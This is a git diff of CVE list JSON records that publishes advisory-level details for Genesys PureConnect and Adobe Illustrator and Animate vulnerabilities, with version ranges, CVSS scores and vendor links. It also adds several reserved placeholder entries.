"value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided."
|
||||
"value": "Genesys PureConnect Interaction Web Tools Chat Service (up to at least 26- September- 2019) allows XSS within the Printable Chat History via the participant -> name JSON POST parameter."
|
||||
}
|
||||
]
|
||||
},
|
||||
"problemtype": {
|
||||
"problemtype_data": [
|
||||
{
|
||||
"description": [
|
||||
{
|
||||
"lang": "eng",
|
||||
"value": "n/a"
|
||||
}
|
||||
]
|
||||
}
|
||||
]
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"url": "http://genesys.com",
|
||||
"refsource": "MISC",
|
||||
"name": "http://genesys.com"
|
||||
},
|
||||
{
|
||||
"url": "https://help.genesys.com/pureconnect/mergedprojects/wh_tr/desktop/pdfs/web_tools_dg.pdf",
|
||||
"refsource": "MISC",
|
||||
"name": "https://help.genesys.com/pureconnect/mergedprojects/wh_tr/desktop/pdfs/web_tools_dg.pdf"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://cxsecurity.com/issue/WLB-2022090038",
|
||||
"url": "https://cxsecurity.com/issue/WLB-2022090038"
|
||||
}
|
||||
]
|
||||
}
|
||||
|
||||
@ -1,18 +1,96 @@
|
||||
{
|
||||
"data_type": "CVE",
|
||||
"data_format": "MITRE",
|
||||
"data_version": "4.0",
|
||||
"CVE_data_meta": {
|
||||
"ASSIGNER": "psirt@adobe.com",
|
||||
"DATE_PUBLIC": "2022-09-13T23:00:00.000Z",
|
||||
"ID": "CVE-2022-38408",
|
||||
"ASSIGNER": "cve@mitre.org",
|
||||
"STATE": "RESERVED"
|
||||
"STATE": "PUBLIC",
|
||||
"TITLE": "Adobe Illustrator Improper Input Validation Arbitrary code execution"
|
||||
},
|
||||
"affects": {
|
||||
"vendor": {
|
||||
"vendor_data": [
|
||||
{
|
||||
"product": {
|
||||
"product_data": [
|
||||
{
|
||||
"product_name": "Illustrator",
|
||||
"version": {
|
||||
"version_data": [
|
||||
{
|
||||
"version_affected": "<=",
|
||||
"version_value": "26.4"
|
||||
},
|
||||
{
|
||||
"version_affected": "<=",
|
||||
"version_value": "25.4.7"
|
||||
},
|
||||
{
|
||||
"version_affected": "<=",
|
||||
"version_value": "None"
|
||||
},
|
||||
{
|
||||
"version_affected": "<=",
|
||||
"version_value": "None"
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
]
|
||||
},
|
||||
"vendor_name": "Adobe"
|
||||
}
|
||||
]
|
||||
}
|
||||
},
|
||||
"data_format": "MITRE",
|
||||
"data_type": "CVE",
|
||||
"data_version": "4.0",
|
||||
"description": {
|
||||
"description_data": [
|
||||
{
|
||||
"lang": "eng",
|
||||
"value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided."
|
||||
"value": "Adobe Illustrator versions 26.4 (and earlier) and 25.4.7 (and earlier) are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. requires user interaction in that a victim must open a malicious file."
|
||||
}
|
||||
]
|
||||
},
|
||||
"impact": {
|
||||
"cvss": {
|
||||
"attackComplexity": "Low",
|
||||
"attackVector": "Local",
|
||||
"availabilityImpact": "High",
|
||||
"baseScore": 7.8,
|
||||
"baseSeverity": "High",
|
||||
"confidentialityImpact": "High",
|
||||
"integrityImpact": "High",
|
||||
"privilegesRequired": "None",
|
||||
"scope": "Unchanged",
|
||||
"userInteraction": "Required",
|
||||
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
|
||||
"version": "3.1"
|
||||
}
|
||||
},
|
||||
"problemtype": {
|
||||
"problemtype_data": [
|
||||
{
|
||||
"description": [
|
||||
{
|
||||
"lang": "eng",
|
||||
"value": "Improper Input Validation (CWE-20)"
|
||||
}
|
||||
]
|
||||
}
|
||||
]
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://helpx.adobe.com/security/products/illustrator/apsb22-55.html",
|
||||
"name": "https://helpx.adobe.com/security/products/illustrator/apsb22-55.html"
|
||||
}
|
||||
]
|
||||
},
|
||||
"source": {
|
||||
"discovery": "EXTERNAL"
|
||||
}
|
||||
}
|
||||
@ -1,18 +1,96 @@
|
||||
{
|
||||
"data_type": "CVE",
|
||||
"data_format": "MITRE",
|
||||
"data_version": "4.0",
|
||||
"CVE_data_meta": {
|
||||
"ASSIGNER": "psirt@adobe.com",
|
||||
"DATE_PUBLIC": "2022-09-13T23:00:00.000Z",
|
||||
"ID": "CVE-2022-38409",
|
||||
"ASSIGNER": "cve@mitre.org",
|
||||
"STATE": "RESERVED"
|
||||
"STATE": "PUBLIC",
|
||||
"TITLE": "Adobe Illustrator EPS File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability"
|
||||
},
|
||||
"affects": {
|
||||
"vendor": {
|
||||
"vendor_data": [
|
||||
{
|
||||
"product": {
|
||||
"product_data": [
|
||||
{
|
||||
"product_name": "Illustrator",
|
||||
"version": {
|
||||
"version_data": [
|
||||
{
|
||||
"version_affected": "<=",
|
||||
"version_value": "26.4"
|
||||
},
|
||||
{
|
||||
"version_affected": "<=",
|
||||
"version_value": "25.4.7"
|
||||
},
|
||||
{
|
||||
"version_affected": "<=",
|
||||
"version_value": "None"
|
||||
},
|
||||
{
|
||||
"version_affected": "<=",
|
||||
"version_value": "None"
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
]
|
||||
},
|
||||
"vendor_name": "Adobe"
|
||||
}
|
||||
]
|
||||
}
|
||||
},
|
||||
"data_format": "MITRE",
|
||||
"data_type": "CVE",
|
||||
"data_version": "4.0",
|
||||
"description": {
|
||||
"description_data": [
|
||||
{
|
||||
"lang": "eng",
|
||||
"value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided."
|
||||
"value": "Adobe Illustrator versions 26.4 (and earlier) and 25.4.7 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file."
|
||||
}
|
||||
]
|
||||
},
|
||||
"impact": {
|
||||
"cvss": {
|
||||
"attackComplexity": "Low",
|
||||
"attackVector": "Local",
|
||||
"availabilityImpact": "None",
|
||||
"baseScore": 5.5,
|
||||
"baseSeverity": "Medium",
|
||||
"confidentialityImpact": "High",
|
||||
"integrityImpact": "None",
|
||||
"privilegesRequired": "None",
|
||||
"scope": "Unchanged",
|
||||
"userInteraction": "Required",
|
||||
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
|
||||
"version": "3.1"
|
||||
}
|
||||
},
|
||||
"problemtype": {
|
||||
"problemtype_data": [
|
||||
{
|
||||
"description": [
|
||||
{
|
||||
"lang": "eng",
|
||||
"value": "Out-of-bounds Read (CWE-125)"
|
||||
}
|
||||
]
|
||||
}
|
||||
]
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://helpx.adobe.com/security/products/illustrator/apsb22-55.html",
|
||||
"name": "https://helpx.adobe.com/security/products/illustrator/apsb22-55.html"
|
||||
}
|
||||
]
|
||||
},
|
||||
"source": {
|
||||
"discovery": "EXTERNAL"
|
||||
}
|
||||
}
|
||||
@ -1,18 +1,96 @@
|
||||
{
|
||||
"data_type": "CVE",
|
||||
"data_format": "MITRE",
|
||||
"data_version": "4.0",
|
||||
"CVE_data_meta": {
|
||||
"ASSIGNER": "psirt@adobe.com",
|
||||
"DATE_PUBLIC": "2022-09-13T23:00:00.000Z",
|
||||
"ID": "CVE-2022-38410",
|
||||
"ASSIGNER": "cve@mitre.org",
|
||||
"STATE": "RESERVED"
|
||||
"STATE": "PUBLIC",
|
||||
"TITLE": "Adobe Illustrator EPS File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability"
|
||||
},
|
||||
"affects": {
|
||||
"vendor": {
|
||||
"vendor_data": [
|
||||
{
|
||||
"product": {
|
||||
"product_data": [
|
||||
{
|
||||
"product_name": "Illustrator",
|
||||
"version": {
|
||||
"version_data": [
|
||||
{
|
||||
"version_affected": "<=",
|
||||
"version_value": "26.4"
|
||||
},
|
||||
{
|
||||
"version_affected": "<=",
|
||||
"version_value": "25.4.7"
|
||||
},
|
||||
{
|
||||
"version_affected": "<=",
|
||||
"version_value": "None"
|
||||
},
|
||||
{
|
||||
"version_affected": "<=",
|
||||
"version_value": "None"
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
]
|
||||
},
|
||||
"vendor_name": "Adobe"
|
||||
}
|
||||
]
|
||||
}
|
||||
},
|
||||
"data_format": "MITRE",
|
||||
"data_type": "CVE",
|
||||
"data_version": "4.0",
|
||||
"description": {
|
||||
"description_data": [
|
||||
{
|
||||
"lang": "eng",
|
||||
"value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided."
|
||||
"value": "Adobe Illustrator versions 26.4 (and earlier) and 25.4.7 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file."
|
||||
}
|
||||
]
|
||||
},
|
||||
"impact": {
|
||||
"cvss": {
|
||||
"attackComplexity": "Low",
|
||||
"attackVector": "Local",
|
||||
"availabilityImpact": "None",
|
||||
"baseScore": 5.5,
|
||||
"baseSeverity": "Medium",
|
||||
"confidentialityImpact": "High",
|
||||
"integrityImpact": "None",
|
||||
"privilegesRequired": "None",
|
||||
"scope": "Unchanged",
|
||||
"userInteraction": "Required",
|
||||
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
|
||||
"version": "3.1"
|
||||
}
|
||||
},
|
||||
"problemtype": {
|
||||
"problemtype_data": [
|
||||
{
|
||||
"description": [
|
||||
{
|
||||
"lang": "eng",
|
||||
"value": "Out-of-bounds Read (CWE-125)"
|
||||
}
|
||||
]
|
||||
}
|
||||
]
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://helpx.adobe.com/security/products/illustrator/apsb22-55.html",
|
||||
"name": "https://helpx.adobe.com/security/products/illustrator/apsb22-55.html"
|
||||
}
|
||||
]
|
||||
},
|
||||
"source": {
|
||||
"discovery": "EXTERNAL"
|
||||
}
|
||||
}
|
||||
@ -1,18 +1,96 @@
|
||||
{
|
||||
"data_type": "CVE",
|
||||
"data_format": "MITRE",
|
||||
"data_version": "4.0",
|
||||
"CVE_data_meta": {
|
||||
"ASSIGNER": "psirt@adobe.com",
|
||||
"DATE_PUBLIC": "2022-09-13T23:00:00.000Z",
|
||||
"ID": "CVE-2022-38411",
|
||||
"ASSIGNER": "cve@mitre.org",
|
||||
"STATE": "RESERVED"
|
||||
"STATE": "PUBLIC",
|
||||
"TITLE": "Adobe Animate SVG File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability"
|
||||
},
|
||||
"affects": {
|
||||
"vendor": {
|
||||
"vendor_data": [
|
||||
{
|
||||
"product": {
|
||||
"product_data": [
|
||||
{
|
||||
"product_name": "Animate",
|
||||
"version": {
|
||||
"version_data": [
|
||||
{
|
||||
"version_affected": "<=",
|
||||
"version_value": "21.0.11"
|
||||
},
|
||||
{
|
||||
"version_affected": "<=",
|
||||
"version_value": "22.0.7"
|
||||
},
|
||||
{
|
||||
"version_affected": "<=",
|
||||
"version_value": "None"
|
||||
},
|
||||
{
|
||||
"version_affected": "<=",
|
||||
"version_value": "None"
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
]
|
||||
},
|
||||
"vendor_name": "Adobe"
|
||||
}
|
||||
]
|
||||
}
|
||||
},
|
||||
"data_format": "MITRE",
|
||||
"data_type": "CVE",
|
||||
"data_version": "4.0",
|
||||
"description": {
|
||||
"description_data": [
|
||||
{
|
||||
"lang": "eng",
|
||||
"value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided."
|
||||
"value": "Adobe Animate version 21.0.11 (and earlier) and 22.0.7 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."
|
||||
}
|
||||
]
|
||||
},
|
||||
"impact": {
|
||||
"cvss": {
|
||||
"attackComplexity": "Low",
|
||||
"attackVector": "Local",
|
||||
"availabilityImpact": "High",
|
||||
"baseScore": 7.8,
|
||||
"baseSeverity": "High",
|
||||
"confidentialityImpact": "High",
|
||||
"integrityImpact": "High",
|
||||
"privilegesRequired": "None",
|
||||
"scope": "Unchanged",
|
||||
"userInteraction": "Required",
|
||||
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
|
||||
"version": "3.1"
|
||||
}
|
||||
},
|
||||
"problemtype": {
|
||||
"problemtype_data": [
|
||||
{
|
||||
"description": [
|
||||
{
|
||||
"lang": "eng",
|
||||
"value": "Heap-based Buffer Overflow (CWE-122)"
|
||||
}
|
||||
]
|
||||
}
|
||||
]
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://helpx.adobe.com/security/products/animate/apsb22-54.html",
|
||||
"name": "https://helpx.adobe.com/security/products/animate/apsb22-54.html"
|
||||
}
|
||||
]
|
||||
},
|
||||
"source": {
|
||||
"discovery": "EXTERNAL"
|
||||
}
|
||||
}
|
||||
@ -1,18 +1,96 @@
|
||||
{
|
||||
"data_type": "CVE",
|
||||
"data_format": "MITRE",
|
||||
"data_version": "4.0",
|
||||
"CVE_data_meta": {
|
||||
"ASSIGNER": "psirt@adobe.com",
|
||||
"DATE_PUBLIC": "2022-09-13T23:00:00.000Z",
|
||||
"ID": "CVE-2022-38412",
|
||||
"ASSIGNER": "cve@mitre.org",
|
||||
"STATE": "RESERVED"
|
||||
"STATE": "PUBLIC",
|
||||
"TITLE": "Adobe Animate SVG File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability"
|
||||
},
|
||||
"affects": {
|
||||
"vendor": {
|
||||
"vendor_data": [
|
||||
{
|
||||
"product": {
|
||||
"product_data": [
|
||||
{
|
||||
"product_name": "Animate",
|
||||
"version": {
|
||||
"version_data": [
|
||||
{
|
||||
"version_affected": "<=",
|
||||
"version_value": "21.0.11"
|
||||
},
|
||||
{
|
||||
"version_affected": "<=",
|
||||
"version_value": "22.0.7"
|
||||
},
|
||||
{
|
||||
"version_affected": "<=",
|
||||
"version_value": "None"
|
||||
},
|
||||
{
|
||||
"version_affected": "<=",
|
||||
"version_value": "None"
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
]
|
||||
},
|
||||
"vendor_name": "Adobe"
|
||||
}
|
||||
]
|
||||
}
|
||||
},
|
||||
"data_format": "MITRE",
|
||||
"data_type": "CVE",
|
||||
"data_version": "4.0",
|
||||
"description": {
|
||||
"description_data": [
|
||||
{
|
||||
"lang": "eng",
|
||||
"value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided."
|
||||
"value": "Adobe Animate version 21.0.11 (and earlier) and 22.0.7 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."
|
||||
}
|
||||
]
|
||||
},
|
||||
"impact": {
|
||||
"cvss": {
|
||||
"attackComplexity": "Low",
|
||||
"attackVector": "Local",
|
||||
"availabilityImpact": "High",
|
||||
"baseScore": 7.8,
|
||||
"baseSeverity": "High",
|
||||
"confidentialityImpact": "High",
|
||||
"integrityImpact": "High",
|
||||
"privilegesRequired": "None",
|
||||
"scope": "Unchanged",
|
||||
"userInteraction": "Required",
|
||||
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
|
||||
"version": "3.1"
|
||||
}
|
||||
},
|
||||
"problemtype": {
|
||||
"problemtype_data": [
|
||||
{
|
||||
"description": [
|
||||
{
|
||||
"lang": "eng",
|
||||
"value": "Out-of-bounds Read (CWE-125)"
|
||||
}
|
||||
]
|
||||
}
|
||||
]
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://helpx.adobe.com/security/products/animate/apsb22-54.html",
|
||||
"name": "https://helpx.adobe.com/security/products/animate/apsb22-54.html"
|
||||
}
|
||||
]
|
||||
},
|
||||
"source": {
|
||||
"discovery": "EXTERNAL"
|
||||
}
|
||||
}
|
||||
@ -68,11 +68,6 @@
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022&month=09",
|
||||
|
||||
@ -68,11 +68,6 @@
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022&month=09",
|
||||
|
||||
@ -68,11 +68,6 @@
|
||||
},
|
||||
"references": {
|
||||
"reference_data": [
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year==2022&month=09"
|
||||
},
|
||||
{
|
||||
"refsource": "MISC",
|
||||
"name": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022&month=09",
|
||||
|
||||
18
2022/40xxx/CVE-2022-40744.json
Normal file
18
2022/40xxx/CVE-2022-40744.json
Normal file
@ -0,0 +1,18 @@
|
||||
{
|
||||
"data_type": "CVE",
|
||||
"data_format": "MITRE",
|
||||
"data_version": "4.0",
|
||||
"CVE_data_meta": {
|
||||
"ID": "CVE-2022-40744",
|
||||
"ASSIGNER": "cve@mitre.org",
|
||||
"STATE": "RESERVED"
|
||||
},
|
||||
"description": {
|
||||
"description_data": [
|
||||
{
|
||||
"lang": "eng",
|
||||
"value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided."
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
18
2022/40xxx/CVE-2022-40745.json
Normal file
18
2022/40xxx/CVE-2022-40745.json
Normal file
@ -0,0 +1,18 @@
|
||||
{
|
||||
"data_type": "CVE",
|
||||
"data_format": "MITRE",
|
||||
"data_version": "4.0",
|
||||
"CVE_data_meta": {
|
||||
"ID": "CVE-2022-40745",
|
||||
"ASSIGNER": "cve@mitre.org",
|
||||
"STATE": "RESERVED"
|
||||
},
|
||||
"description": {
|
||||
"description_data": [
|
||||
{
|
||||
"lang": "eng",
|
||||
"value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided."
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
18
2022/40xxx/CVE-2022-40746.json
Normal file
18
2022/40xxx/CVE-2022-40746.json
Normal file
@ -0,0 +1,18 @@
|
||||
{
|
||||
"data_type": "CVE",
|
||||
"data_format": "MITRE",
|
||||
"data_version": "4.0",
|
||||
"CVE_data_meta": {
|
||||
"ID": "CVE-2022-40746",
|
||||
"ASSIGNER": "cve@mitre.org",
|
||||
"STATE": "RESERVED"
|
||||
},
|
||||
"description": {
|
||||
"description_data": [
|
||||
{
|
||||
"lang": "eng",
|
||||
"value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided."
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
18
2022/40xxx/CVE-2022-40747.json
Normal file
18
2022/40xxx/CVE-2022-40747.json
Normal file
@ -0,0 +1,18 @@
|
||||
{
|
||||
"data_type": "CVE",
|
||||
"data_format": "MITRE",
|
||||
"data_version": "4.0",
|
||||
"CVE_data_meta": {
|
||||
"ID": "CVE-2022-40747",
|
||||
"ASSIGNER": "cve@mitre.org",
|
||||
"STATE": "RESERVED"
|
||||
},
|
||||
"description": {
|
||||
"description_data": [
|
||||
{
|
||||
"lang": "eng",
|
||||
"value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided."
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
18
2022/40xxx/CVE-2022-40748.json
Normal file
18
2022/40xxx/CVE-2022-40748.json
Normal file
@ -0,0 +1,18 @@
|
||||
{
|
||||
"data_type": "CVE",
|
||||
"data_format": "MITRE",
|
||||
"data_version": "4.0",
|
||||
"CVE_data_meta": {
|
||||
"ID": "CVE-2022-40748",
|
||||
"ASSIGNER": "cve@mitre.org",
|
||||
"STATE": "RESERVED"
|
||||
},
|
||||
"description": {
|
||||
"description_data": [
|
||||
{
|
||||
"lang": "eng",
|
||||
"value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided."
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
18
2022/40xxx/CVE-2022-40749.json
Normal file
18
2022/40xxx/CVE-2022-40749.json
Normal file
@ -0,0 +1,18 @@
|
||||
{
|
||||
"data_type": "CVE",
|
||||
"data_format": "MITRE",
|
||||
"data_version": "4.0",
|
||||
"CVE_data_meta": {
|
||||
"ID": "CVE-2022-40749",
|
||||
"ASSIGNER": "cve@mitre.org",
|
||||
"STATE": "RESERVED"
|
||||
},
|
||||
"description": {
|
||||
"description_data": [
|
||||
{
|
||||
"lang": "eng",
|
||||
"value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided."
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
18
2022/40xxx/CVE-2022-40750.json
Normal file
18
2022/40xxx/CVE-2022-40750.json
Normal file
@ -0,0 +1,18 @@
|
||||
{
|
||||
"data_type": "CVE",
|
||||
"data_format": "MITRE",
|
||||
"data_version": "4.0",
|
||||
"CVE_data_meta": {
|
||||
"ID": "CVE-2022-40750",
|
||||
"ASSIGNER": "cve@mitre.org",
|
||||
"STATE": "RESERVED"
|
||||
},
|
||||
"description": {
|
||||
"description_data": [
|
||||
{
|
||||
"lang": "eng",
|
||||
"value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided."
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
18
2022/40xxx/CVE-2022-40751.json
Normal file
18
2022/40xxx/CVE-2022-40751.json
Normal file
@ -0,0 +1,18 @@
|
||||
{
|
||||
"data_type": "CVE",
|
||||
"data_format": "MITRE",
|
||||
"data_version": "4.0",
|
||||
"CVE_data_meta": {
|
||||
"ID": "CVE-2022-40751",
|
||||
"ASSIGNER": "cve@mitre.org",
|
||||
"STATE": "RESERVED"
|
||||
},
|
||||
"description": {
|
||||
"description_data": [
|
||||
{
|
||||
"lang": "eng",
|
||||
"value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided."
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
18
2022/40xxx/CVE-2022-40752.json
Normal file
18
2022/40xxx/CVE-2022-40752.json
Normal file
@ -0,0 +1,18 @@
|
||||
{
|
||||
"data_type": "CVE",
|
||||
"data_format": "MITRE",
|
||||
"data_version": "4.0",
|
||||
"CVE_data_meta": {
|
||||
"ID": "CVE-2022-40752",
|
||||
"ASSIGNER": "cve@mitre.org",
|
||||
"STATE": "RESERVED"
|
||||
},
|
||||
"description": {
|
||||
"description_data": [
|
||||
{
|
||||
"lang": "eng",
|
||||
"value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided."
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
18
2022/40xxx/CVE-2022-40753.json
Normal file
18
2022/40xxx/CVE-2022-40753.json
Normal file
@ -0,0 +1,18 @@
|
||||
{
|
||||
"data_type": "CVE",
|
||||
"data_format": "MITRE",
|
||||
"data_version": "4.0",
|
||||
"CVE_data_meta": {
|
||||
"ID": "CVE-2022-40753",
|
||||
"ASSIGNER": "cve@mitre.org",
|
||||
"STATE": "RESERVED"
|
||||
},
|
||||
"description": {
|
||||
"description_data": [
|
||||
{
|
||||
"lang": "eng",
|
||||
"value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided."
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
Loading…
x
Reference in New Issue
Block a user